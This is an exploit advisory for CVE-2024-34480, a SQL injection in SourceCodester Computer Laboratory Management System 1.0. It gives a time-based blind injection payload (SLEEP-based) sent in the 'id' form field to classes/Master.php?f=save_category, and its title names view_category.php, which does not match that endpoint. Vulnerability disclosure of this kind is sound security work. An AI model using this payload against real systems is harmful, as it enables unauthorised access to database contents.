# Exploit Title: SourceCodester Computer Laboratory Management System 1.0 (view_category.php) - SQL Injection # Date: 05 May 2024 # Exploit Author: Kavia Baskar # Vendor Homepage: https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html # Version: v1.0 # CVE: CVE-2024-34480 # Tested on: Windows, XAMPP, Apache, MySQL [Suggested description] SourceCodester Computer Laboratory Management System 1.0 allows classes/Master.php id SQL Injection. ------------------------------------------ [Vulnerability Type] SQL Injection ------------------------------------------ [Vendor of Product] SourceCodester ------------------------------------------ [Affected Product Code Base] SourceCodester Computer Laboratory Management System - 1.0 ------------------------------------------ [Affected Component] The functionality allowing users to modify borrowing records information within the application. ------------------------------------------ [Attack Type] Local ------------------------------------------ [Impact Code execution] true ------------------------------------------ [Impact Denial of Service] true ------------------------------------------ [Impact Information Disclosure] true ------------------------------------------ [Attack Vectors] To exploit this vulnerability, the following payload can be used to retrieve the data from the database ------WebKitFormBoundaryeubsFzqrWToLg4au Content-Disposition: form-data; name="id" ' AND (SELECT 6270 FROM (SELECT(SLEEP(5)))jgeq) AND 'QpoF'='QpoF on 'id' parameter on 'http://localhost/php-lms/classes/Master.php?f=save_category' ------------------------------------------ [Reference] https://www.strongboxit.com/ [Discoverer] Kavia Baskar with StrongBox IT